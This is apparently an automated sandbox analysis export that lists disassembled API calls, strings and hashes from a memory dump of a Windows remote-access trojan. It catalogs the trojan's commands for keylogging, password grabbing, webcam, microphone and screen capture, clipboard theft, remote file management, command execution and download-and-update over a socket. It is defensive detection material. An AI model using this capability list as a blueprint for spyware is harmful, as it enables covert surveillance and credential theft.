                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,pong,00415268,00000000,00000001,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A81C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A82C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A83C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000,00000000,?,?,?,00000000), ref: 0040A84C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00000000,00000000), ref: 0040A85C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040A869
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A876
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A897
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8A0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8AC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8C4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8D0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8DC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8E8
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8F4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8FD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A906
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040A918
                              • atoi.MSVCRT ref: 0040A925
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00410844), ref: 0040A965
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,filemgr), ref: 0040A9A2
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A9BA
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,close), ref: 0040B63C
                              • exit.MSVCRT ref: 0040B646
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,uninstall), ref: 0040B655
                              • Sleep.KERNEL32(00000064), ref: 0040B668
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,updatefromurl), ref: 0040B683
                              • Sleep.KERNEL32(00000064), ref: 0040B69A
                              • getenv.MSVCRT ref: 0040B6BB
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040B6C6
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040B6D1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B6DE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B6E9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B6F2
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040B6FF
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B712
                              • URLDownloadToFileA.URLMON(00000000,00000000), ref: 0040B71A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B72C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B73D
                                • Part of subcall function 004026F2: GetLocalTime.KERNEL32(?,76E50440,00415A30,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040271B
                                • Part of subcall function 004026F2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040A946,?,?), ref: 00402747
                                • Part of subcall function 004026F2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 00402752
                                • Part of subcall function 004026F2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040A946,?), ref: 0040275C
                                • Part of subcall function 004026F2: printf.MSVCRT ref: 00402763
                                • Part of subcall function 004026F2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040276F
                                • Part of subcall function 004026F2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402778
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,updatefromlocal), ref: 0040B751
                              • Sleep.KERNEL32(00000064), ref: 0040B768
                              • getenv.MSVCRT ref: 0040B789
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040B794
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040B79F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B7AC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B7B7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B7C0
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000032,00000001), ref: 0040B7CD
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040B7DA
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040B7E6
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000002), ref: 0040B7FC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040B80F
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000), ref: 0040B81C
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040B828
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B837
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040B84B
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,msgbox), ref: 0040B862
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040B876
                              • atoi.MSVCRT ref: 0040B87D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,-00010000), ref: 0040B892
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B8A5
                              • MessageBoxA.USER32(00000000,00000000), ref: 0040B8AE
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,keyinput), ref: 0040B8C2
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040B8D6
                              • atoi.MSVCRT ref: 0040B8DD
                                • Part of subcall function 0040E46D: SendInput.USER32(00000001,?,0000001C,00415268), ref: 0040E495
                                • Part of subcall function 0040E46D: SendInput.USER32(00000001,00000001,0000001C), ref: 0040E4A6
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,mclick), ref: 0040B8F5
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040B909
                              • atoi.MSVCRT ref: 0040B910
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040B920
                              • atoi.MSVCRT ref: 0040B927
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040B937
                              • atoi.MSVCRT ref: 0040B93E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A880
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,keepaliveoff), ref: 0040A988
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,deletefile), ref: 0040B60D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040B621
                              • DeleteFileA.KERNEL32(00000000), ref: 0040B628
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BC78
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BC8C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@V?$basic_string@$??0?$basic_string@?c_str@?$basic_string@$Hstd@@$??8std@@$V01@@$V10@0@$D@1@@atoi$?length@?$basic_string@D@std@@@std@@G@2@@std@@G@std@@$InputSleepV10@V12@$CountFileSendTickWindowgetenv$??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@?size@?$basic_string@?substr@?$basic_string@?write@?$basic_ostream@CloseD?$basic_ofstream@DeleteDownloadEventForegroundG@1@@HandleInfoLastLocalMessageTextTimeV01@V10@@_itoaexitprintf
                              • String ID: AppData$OSpower$PowrProf.dll$SetSuspendState$autogetofflinelogs$clearlogins$clipboarddata$close$closeprocfromwindow$closewindow$cmdoutput$consolecmd$deletefile$deletekeylog$dlldata$dllurl$downloadfromlocaltofile$downloadfromurltofile$dwnldscr$emptyclipboard$execcom$filemgr$freecamcap$freescrcap$getcamlib$getclipboard$getofflinelogs$getproclist$getscrslist$getwindows$initcamcap$initfun$initializescrcap$initklfrm$initregedit$initremscript$keepaliveoff$keyinput$maxwindow$mclick$miccapture$msgbox$open$openaddress$ping$pong$prockill$proclist$pwgrab$restorewindow$scrcap$screenshotdata$scrslist$setclipboard$startonlinekl$stopmiccapture$stoponlinekl$uninstall$updatefromlocal$updatefromurl
                              • API String ID: 4235549877-3954364873
                              • Opcode ID: d803311f4985f16bfd57f944ab0b11466922ca7c54233d1ce0ba41a78679c5cb
                              • Instruction ID: 15dfb3fcceeeb11733fb975214f02c8d6630f90493aa5ef66b82fcebf2304a7a
                              • Opcode Fuzzy Hash: d803311f4985f16bfd57f944ab0b11466922ca7c54233d1ce0ba41a78679c5cb
                              • Instruction Fuzzy Hash: DFC26271940219ABDF04A7A1EC5AEEE7738EF55304F10447AF502B20E1DFB89A89CB5D

                              Control-flow Graph: rendered graph of the function at 40bea2 (blocks 40bea2-40c63e, executed / not executed colouring); the graph is not reproduced in this text export.
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410858,?,?,76E50440,00415268,6A41AFB0), ref: 0040BEBC
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040BECB
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040BEEE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040BEF8
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,getdrives), ref: 0040BF0D
                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0040BF22
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 0040BF38
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004116FC,00000000,00000002), ref: 0040BF49
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 0040BF54
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040BF63
                                • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,6A41AFB0), ref: 004083F4
                                • Part of subcall function 004083E6: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004083FD
                                • Part of subcall function 004083E6: GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00408415
                                • Part of subcall function 004083E6: _itoa.MSVCRT ref: 0040841C
                                • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00408432
                                • Part of subcall function 004083E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040843A
                                • Part of subcall function 004083E6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00408449
                                • Part of subcall function 004083E6: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00408456
                                • Part of subcall function 004083E6: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408462
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040846B
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408474
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040847D
                                • Part of subcall function 004083E6: lstrlenA.KERNEL32(00000000), ref: 00408484
                                • Part of subcall function 004083E6: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040849A
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084A3
                                • Part of subcall function 004083E6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084AC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,driveslist,00415268,?,00415268,00000000), ref: 0040BF8D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00000000), ref: 0040BF9A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000), ref: 0040BFA7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFC6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFCF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFDB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFE4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFED
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000), ref: 0040BFB1
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,listfiles), ref: 0040C001
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C031
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C623
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C634
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@2@@0@V?$basic_string@$V01@@$D@1@@Hstd@@$?length@?$basic_string@V10@0@$??4?$basic_string@??8std@@?c_str@?$basic_string@?find@?$basic_string@DriveV01@V10@V12@$?data@?$basic_string@?resize@?$basic_string@?substr@?$basic_string@LogicalStringsTypeV10@@_itoalstrlen
                              • String ID: Unable to rename file!$delete$download$driveslist$getdrives$listfiles$newfolder$open$open$rename$search$sendfiledata$showmsg$stopsearch$upload
                              • API String ID: 3022309246-3399653838
                              • Opcode ID: f69ad1251e661361170cebbda10b8b92ca4ecd91549d69f2b73608baae335c96
                              • Instruction ID: d8c6c4d787ab652cc050522138cbe33c2e5dc8e9482fe9015d7f3b3e7ca7eb0a
                              • Opcode Fuzzy Hash: f69ad1251e661361170cebbda10b8b92ca4ecd91549d69f2b73608baae335c96
                              • Instruction Fuzzy Hash: 9B225C72900109ABDB04EBE1DD5E9EE7B7CEB44305F10057AF502F20D1EE795A89CBA9

                              Control-flow Graph (rendered graph not reproduced here; the APIs list below covers the same function)
                              APIs
                              • _EH_prolog.MSVCRT ref: 00402C4A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,6A41AFB0,6A41AFB0), ref: 00402C67
                              • socket.WS2_32(00000000,00000001,00000006), ref: 00402C7A
                              • connect.WS2_32(00000000,00415278,00000010), ref: 00402C89
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchstarted,00415268,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CB8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CC8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CD8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?,?,00000000,00000001,00000006), ref: 00402CE2
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
